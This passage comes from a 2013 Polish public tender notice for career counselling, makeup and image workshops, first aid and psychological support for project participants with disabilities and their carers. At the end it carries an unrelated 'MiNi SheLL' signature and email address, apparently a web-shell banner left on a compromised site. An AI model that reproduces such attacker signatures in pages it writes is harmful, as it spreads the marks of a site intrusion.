- dla 4 uczestników projektu (osoby z ustalonym stopniem niepełnosprawności); celem zajęć jest diagnoza indywidualnych predyspozycji zawodowych i zwiększenie poczucia bezpieczeństwa w poruszaniu się na rynku pracy, opracowanie indywidualnego planu działania. Zakres tematyczny zajęć: współczesny rynek pracy, omówienie dokumentów aplikacyjnych, oraz ulg i przywilejów przysługującym osobom niepełnosprawnym w stosunku pracy, plan działania w zakresie poszukiwania pracy. Ilość: 3 godziny zegarowe.
Zamawiający zastrzega sobie możliwość zmiany ilości uczestników ww zajęć w przypadku przerwania lub zakończenia udziału w projekcie, rekrutacji nowego uczestnika i związaną z tym zmianę ilości godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 80.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WIZAŻ- KREOWANIE WIZERUNKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Spotkania grupowe z wizażystką - przygotowanie i przeprowadzenie warsztatów z zakresu doskonalenia umiejętności komunikowania się. Omówienie roli, istoty wizerunku, wyglądu zewnętrznego w trakcie poszukiwania pracy, omówienie typu sylwetki, kształtów twarzy i propozycji fryzur, makijaż, dobór odpowiedniego makijażu do typu urody, do okazji. Przekazanie uczestnikom  materiałów szkoleniowych oraz kosmetyków w trakcie spotkania celem samodzielnego wykonania działań zmierzających  do poprawy własnego wizerunku. Udokumentowanie obecności uczestników na spotkaniu., przekazanie Zamawiającemu karty pracy z odbytego spotkania. Zajęcia prowadzone będą w 2 grupach: 
- dla 17 uczestników projektu; ilość: 4 godziny zegarowe; termin realizacji: maj 2013 - czerwiec 2013 r.;
- dla 4 uczestników projektu opiekunowie dzieci niepełnosprawnych ilość: 4 godziny zegarowe Zamawiający zastrzega sobie możliwość zmiany ilości uczestników ww zajęć w przypadku przerwania lub zakończenia udziału w projekcie, rekrutacji nowego uczestnika i związaną z tym zmianę ilości godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS PIERWSZEJ POMOCY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs pierwszej pomocy - przygotowanie i przeprowadzenie kursu z zakresu udzielania przedmedycznej pierwszej pomocy, w trakcie których należy przekazać wiedzę teoretyczną  i  praktyczną z zakresu postępowania w miejscu udzielania pomocy w następstwie: zatrzymania oddechu i krążenia- resuscytacja krążeniowo-oddechowa, zakrztuszeń, ran i ich zabezpieczeń, porażenia słonecznego, złamań, wstrząsu, porażenia prądem. Wykonawca zobowiązany będzie do udokumentowania obecności uczestników , przekazania Zamawiającemu karty pracy z odbytego kursu.
Kurs prowadzony będzie w 2 grupach:
- dla 17 uczestników projektu; ilość: 4 godziny zegarowe; termin realizacji: maj 2013 - czerwiec 2013;
- dla 4 uczestników projektu opiekunowie dzieci niepełnosprawnych; ilość: 4 godziny zegarowe;
Zamawiający zastrzega sobie możliwość zmiany ilości uczestników ww zajęć w przypadku przerwania lub zakończenia udziału w projekcie, rekrutacji nowego uczestnika i związaną z tym zmianę ilości godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PORADNICTWO PSYCHOLOGICZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konsultacje indywidualne z psychologiem - przeprowadzenie konsultacji indywidualnych dla 15 uczestników projektu, po 2 godziny zegarowe dla każdego uczestnika; w ramach indywidualnych konsultacji psycholog winien udzielić uczestnikom wsparcia psychologicznego w formie terapii indywidualnej, w rozwiązywaniu problemów psychologicznych dotyczących przede wszystkim aktywności zawodowej uczestników projektu, w pokonywaniu stresu, przygotować indywidualny plan działania; dyżury psychologa z zastrzeżeniem zapisu pkt. 3 rozdz. 4 SIWZ, winny być zorganizowane w godzinach uzgodnionych z uczestnikami projektu; łączna ilość: 30 godzin zegarowych
Warsztaty umiejętności wychowawczych - przygotowanie i przeprowadzenie warsztatów dla grupy 17 uczestników projektu; ilość: 10 godzin zegarowych; termin realizacji: od maja 2013 do lipca 2013 r.;
Warsztaty umiejętności psychospołecznych - przygotowanie i przeprowadzenie warsztatów, których celem jest między innymi wzmacnianie pozytywnych postaw życiowych i radzenie sobie z sytuacjami kryzysowymi; zajęcia prowadzone będą w 3 grupach:
-  dla 20 uczestników projektu; ilość: 10 godzin zegarowych; termin realizacji: od  maja 2013  do czerwca 2013r.;
-  dla 4 uczestników projektu (opiekunowie dzieci niepełnosprawnych);  ilość: 6 godzin zegarowych; termin realizacji: od maja 2013  do czerwca 2013 r.;
- dla 4 uczestników projektu (osoby z stopniem niepełnosprawności); ilość: 6 godzin zegarowych
Zamawiający zastrzega sobie możliwość zmiany ilości uczestników w/w zajęć w przypadku przerwania lub zakończenia udziału w projekcie, rekrutacji nowego uczestnika i związaną z tym zmianę ilości godzin.
W stosunku do wszystkich części: Wykonawcy zobowiązani są do przekazania w terminie 5 dni kalendarzowych przed rozpoczęciem zajęć szczegółowego programu i harmonogramu zajęć, prowadzenia dziennika zajęć, udokumentowanie obecności uczestników projektu na zajęciach, przekazania zamawiającemu kart pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com